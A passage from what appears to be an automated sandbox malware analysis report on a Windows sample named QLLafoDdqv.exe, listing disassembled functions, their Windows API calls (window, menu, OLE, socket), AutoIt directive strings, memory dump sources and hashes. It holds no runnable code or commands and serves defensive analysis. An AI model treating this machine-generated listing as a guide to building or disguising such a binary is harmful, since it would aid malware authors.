              • _free.LIBCMT ref: 00701834
              • _free.LIBCMT ref: 0070183E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\QLLafoDdqv.exe
              • API String ID: 2506810119-2112601532
              • Opcode ID: 8f219d75a4ff58c022a9be24b0c004762cd65d40b0b89a7f3044198a0faba532
              • Instruction ID: 6a91dd4f0997c32a4051d17be47ffe5fb5802b1ed42516ec18b0040fd737edcd
              • Opcode Fuzzy Hash: 8f219d75a4ff58c022a9be24b0c004762cd65d40b0b89a7f3044198a0faba532
              • Instruction Fuzzy Hash: 93318F75A00218EFDB21DF999885D9EBBFCEB85320F948266F50497291D6B88E40CB90
              Function 0073C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
              Download Yara Rule
              APIs
              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0073C306
              • DeleteMenu.USER32(?,00000007,00000000), ref: 0073C34C
              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007A1990,01744FD0), ref: 0073C395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$Delete$InfoItem
              • String ID: 0
              • API String ID: 135850232-4108050209
              • Opcode ID: 0aed95ff483f9672e61020b49c67e7d57b4b147433279959c10424b1bdf85d69
              • Instruction ID: 52404b56cc1800c8b4f3a20fb988fd5bce5d133b8ad8112c27d4d6a937269518
              • Opcode Fuzzy Hash: 0aed95ff483f9672e61020b49c67e7d57b4b147433279959c10424b1bdf85d69
              • Instruction Fuzzy Hash: 6A41B1312043019FE721DF24D885B2ABBE4AF85310F10861DF9A6A72D2D778E904CB63
              Function 00764416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
              Download Yara Rule
              APIs
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0076CC08,00000000,?,?,?,?), ref: 007644AA
              • GetWindowLongW.USER32 ref: 007644C7
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007644D7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Long
              • String ID: SysTreeView32
              • API String ID: 847901565-1698111956
              • Opcode ID: 7708319bc41d90098ebf21d0d9d63f8a695fc6c4473551456fb7d89b8a62e06e
              • Instruction ID: bbcbfaec3b4b626f7807ba028c04e00a1d52810532d0e072372c81a13214ff0f
              • Opcode Fuzzy Hash: 7708319bc41d90098ebf21d0d9d63f8a695fc6c4473551456fb7d89b8a62e06e
              • Instruction Fuzzy Hash: 5231B031210245AFDF218E38DC46BEA7BA9EB09334F204319FD76A21D1DB78EC609B54
              Function 00736E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
              Download Yara Rule
              APIs
              • SysReAllocString.OLEAUT32(?,?), ref: 00736EED
              • VariantCopyInd.OLEAUT32(?,?), ref: 00736F08
              • VariantClear.OLEAUT32(?), ref: 00736F12
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$AllocClearCopyString
              • String ID: *js
              • API String ID: 2173805711-2626009487
              • Opcode ID: 0d75b4065e026734700bb5360326a6fc620bdca79412f94b3b0d024d0dbca17e
              • Instruction ID: 48b268d46495c9335c4d7145dbfba7f0ec4550f085271a6b035fd0b0a9ba48e8
              • Opcode Fuzzy Hash: 0d75b4065e026734700bb5360326a6fc620bdca79412f94b3b0d024d0dbca17e
              • Instruction Fuzzy Hash: AE31D371A04246EFDB05AF64E8509BD3776FF40700F108499F8065B3A2CB389911DBD8
              Function 0075304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0075335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00753077,?,?), ref: 00753378
              • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
              • _wcslen.LIBCMT ref: 0075309B
              • htons.WSOCK32(00000000,?,?,00000000), ref: 00753106
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
              • String ID: 255.255.255.255
              • API String ID: 946324512-2422070025
              • Opcode ID: cfd413a5f80bfbf8e6e48fe0957819c9fc4c5206f30d1741d1fc8c6a4cbcaa3b
              • Instruction ID: 8bae0f3703246e86e44192611dcd425c063d6304dd19da8dd8a0a0903365b90a
              • Opcode Fuzzy Hash: cfd413a5f80bfbf8e6e48fe0957819c9fc4c5206f30d1741d1fc8c6a4cbcaa3b
              • Instruction Fuzzy Hash: 5231D2356007099FCB20CF28C485EAA77E1EF14395F248059EC198B3A2DBBADE49C760
              Function 00764653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00764705
              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00764713
              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0076471A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$DestroyWindow
              • String ID: msctls_updown32
              • API String ID: 4014797782-2298589950
              • Opcode ID: d10cfbd617b68d94fc6a4d53ba685a82c9c26ccafe010753bbbc337ba23c418a
              • Instruction ID: 40424fa5bee75a807e35ada9b944006c78102cbdb22b627ac0217f90d27794e9
              • Opcode Fuzzy Hash: d10cfbd617b68d94fc6a4d53ba685a82c9c26ccafe010753bbbc337ba23c418a
              • Instruction Fuzzy Hash: 35216DB5600209AFEB11DF68DCD1DB737ADEF9A3A4B044059FA019B3A1CB74EC51CA64
              Function 007395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
              • API String ID: 176396367-2734436370
              • Opcode ID: 458baf49792f4e40c3bb1b0b3af463a518df9fbc4286d66df2102fe7904b3fdb
              • Instruction ID: bacd86d3e858ff6217c0d82db2bb9a88c992e1bca43e5efbfd00c3a4e5fc0e14
              • Opcode Fuzzy Hash: 458baf49792f4e40c3bb1b0b3af463a518df9fbc4286d66df2102fe7904b3fdb
              • Instruction Fuzzy Hash: 1A215BB2205610A6E331AB249C03FB773D99F51300F50402AFB4A97183FBD9AD95C2E9
              Function 007637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00763840
              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00763850
              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00763876
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$MoveWindow
              • String ID: Listbox
              • API String ID: 3315199576-2633736733
              • Opcode ID: b004571a43074dd32b4e269973127eea57797e16da87a1466730505667b9d28c
              • Instruction ID: fe75e9871b3483d1eb68118384b131939731943502bf08d5ebff0116ac817b3f
              • Opcode Fuzzy Hash: b004571a43074dd32b4e269973127eea57797e16da87a1466730505667b9d28c
              • Instruction Fuzzy Hash: 2421BE72610219BBEF218F54DC85EBB376AEF89760F108124F9069B190C6B9DC52CBA0
              Function 007449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00744A08
              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00744A5C
              • SetErrorMode.KERNEL32(00000000,?,?,0076CC08), ref: 00744AD0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$InformationVolume
              • String ID: %lu
              • API String ID: 2507767853-685833217
              • Opcode ID: 88736f01990f067338aa17dcad6507fa95d52dec8dbb1bdd453ad98407896521
              • Instruction ID: 1d7f42c9a69ce4f66b0bef81adf5ff38ef5defd6926affee26270bb8a5724b4b
              • Opcode Fuzzy Hash: 88736f01990f067338aa17dcad6507fa95d52dec8dbb1bdd453ad98407896521
              • Instruction Fuzzy Hash: 80318571A00208AFDB51DF54C885EAA77F9EF05304F148099F905DB352DB75ED45CB61
              Function 007641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0076424F
              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00764264
              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00764271
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: msctls_trackbar32
              • API String ID: 3850602802-1010561917
              • Opcode ID: 9fe7f0ae9ccfb68a6981fc619dc13063b80447185b742a9ec04703c2eb000e94
              • Instruction ID: 7bbe609f8ab5cf53e598c2bb5e16c284671f850ee0946b5a394f54dbaeea9766
              • Opcode Fuzzy Hash: 9fe7f0ae9ccfb68a6981fc619dc13063b80447185b742a9ec04703c2eb000e94
              • Instruction Fuzzy Hash: 1F110631240208BEEF205F29CC46FAB3BACFF85B64F110114FE56E2090D2B5DC519B14
              Function 00732F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
                • Part of subcall function 00732DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00732DC5
                • Part of subcall function 00732DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00732DD6
                • Part of subcall function 00732DA7: GetCurrentThreadId.KERNEL32 ref: 00732DDD
                • Part of subcall function 00732DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00732DE4
              • GetFocus.USER32 ref: 00732F78
                • Part of subcall function 00732DEE: GetParent.USER32(00000000), ref: 00732DF9
              • GetClassNameW.USER32(?,?,00000100), ref: 00732FC3
              • EnumChildWindows.USER32(?,0073303B), ref: 00732FEB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
              • String ID: %s%d
              • API String ID: 1272988791-1110647743
              • Opcode ID: e0d4445714e65765eae1686e579efbb935125b4d1a08040e2304c7c25f187dfe
              • Instruction ID: 887d09f186c8bce824e969f4d3c776e8500d7e885fe8050e7939366c038ca45e
              • Opcode Fuzzy Hash: e0d4445714e65765eae1686e579efbb935125b4d1a08040e2304c7c25f187dfe
              • Instruction Fuzzy Hash: AD11A271700205ABEF557F60CC89EFD376AAF84304F04807AF9099B253DE7999468B74
              Function 00765882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
              Download Yara Rule
              APIs
              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007658C1
              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007658EE
              • DrawMenuBar.USER32(?), ref: 007658FD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Menu$InfoItem$Draw
              • String ID: 0
              • API String ID: 3227129158-4108050209
              • Opcode ID: ffad0def0f13d2263da7d31a44227255df1a1bd573a65feed165e8317ed7d498
              • Instruction ID: bb8d798c7b42eb1189047f17ec5f305e0f0b15b759f413a5ea120edbeda8dd64
              • Opcode Fuzzy Hash: ffad0def0f13d2263da7d31a44227255df1a1bd573a65feed165e8317ed7d498
              • Instruction Fuzzy Hash: 02018B31500348EFDB219F11DC44BAEBBB5FB45360F108099E88AD6151DB74AA94EF24
              Function 0073007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8253753b864a3daf44eb555188ef87f633ac7682bed257e6c910e5f3f7479465
              • Instruction ID: cdca53d831ec80b7a9a20f072e284b40d4f6bed1f333797430e0f4dfafa3a108
              • Opcode Fuzzy Hash: 8253753b864a3daf44eb555188ef87f633ac7682bed257e6c910e5f3f7479465
              • Instruction Fuzzy Hash: 93C17C75A0020AEFEB14CFA4C8A8EAEB7B5FF48714F108598E505EB252D735ED41DB90
              Function 0075342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearInitInitializeUninitialize
              • String ID:
              • API String ID: 1998397398-0
              • Opcode ID: 3c797e3134306c09a8fe332146ff964e4a4719a0df5244d677baa0b12027594a
              • Instruction ID: ab110ab4ba726a20137004dbefb56dde8aaae6da419b3913df00796c443cd1d3
              • Opcode Fuzzy Hash: 3c797e3134306c09a8fe332146ff964e4a4719a0df5244d677baa0b12027594a
              • Instruction Fuzzy Hash: 32A156756042009FC700DF28C485A6AB7E6EF88351F04895DFD8A9B362EB74EE05CB96
              Function 00730436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
              Download Yara Rule
              APIs
              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0076FC08,?), ref: 007305F0
              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0076FC08,?), ref: 00730608
              • CLSIDFromProgID.OLE32(?,?,00000000,0076CC40,000000FF,?,00000000,00000800,00000000,?,0076FC08,?), ref: 0073062D
              • _memcmp.LIBVCRUNTIME ref: 0073064E
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FromProg$FreeTask_memcmp
              • String ID:
              • API String ID: 314563124-0
              • Opcode ID: 51b789e23a84144422b5f9bab7c606f772b1a5cbeae1182c56737177ce12baba
              • Instruction ID: 14643ad8cec9f014846410a42d0494bb1c4970297969af7c41aacff3403e02b6
              • Opcode Fuzzy Hash: 51b789e23a84144422b5f9bab7c606f772b1a5cbeae1182c56737177ce12baba
              • Instruction Fuzzy Hash: 7B815C71A00109EFDB04DF94C994EEEB7B9FF89315F204198F506AB251DB75AE06CBA0
              Function 00711391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: ac7449862de37793cccf28df96c29ee6b0aad95c3aecc1afc115ba5fd4e0f20b
              • Instruction ID: 9ded31d98f96b9f742e07b3129599e4eab34caeb44a677261bc3a00c9c359610
              • Opcode Fuzzy Hash: ac7449862de37793cccf28df96c29ee6b0aad95c3aecc1afc115ba5fd4e0f20b
              • Instruction Fuzzy Hash: 56415C31600144EBDB216BFC8C4AAFE3AE6EF41770F544225FF19DA1D2E63C89819762
              Function 00766278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
              Download Yara Rule
              APIs
              • GetWindowRect.USER32(0174EBD0,?), ref: 007662E2
              • ScreenToClient.USER32(?,?), ref: 00766315
              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00766382
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ClientMoveRectScreen
              • String ID:
              • API String ID: 3880355969-0
              • Opcode ID: f6bf5943e4a54002916e905dc0ee04c00ab54ede5f30f7929b8415f10dcb7526
              • Instruction ID: 64facde40cee0d18254da372a64f90f244da86788e41b0d8d4ce4715fa12eab9
              • Opcode Fuzzy Hash: f6bf5943e4a54002916e905dc0ee04c00ab54ede5f30f7929b8415f10dcb7526
              • Instruction Fuzzy Hash: 6D513A74A00249EFDF10DF69D8809AE7BB6FF85360F50815AF9169B290D734ED81CB50
              Function 00751AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
              Download Yara Rule
              APIs
              • socket.WSOCK32(00000002,00000002,00000011), ref: 00751AFD
              • WSAGetLastError.WSOCK32 ref: 00751B0B
              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00751B8A
              • WSAGetLastError.WSOCK32 ref: 00751B94
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$socket
              • String ID:
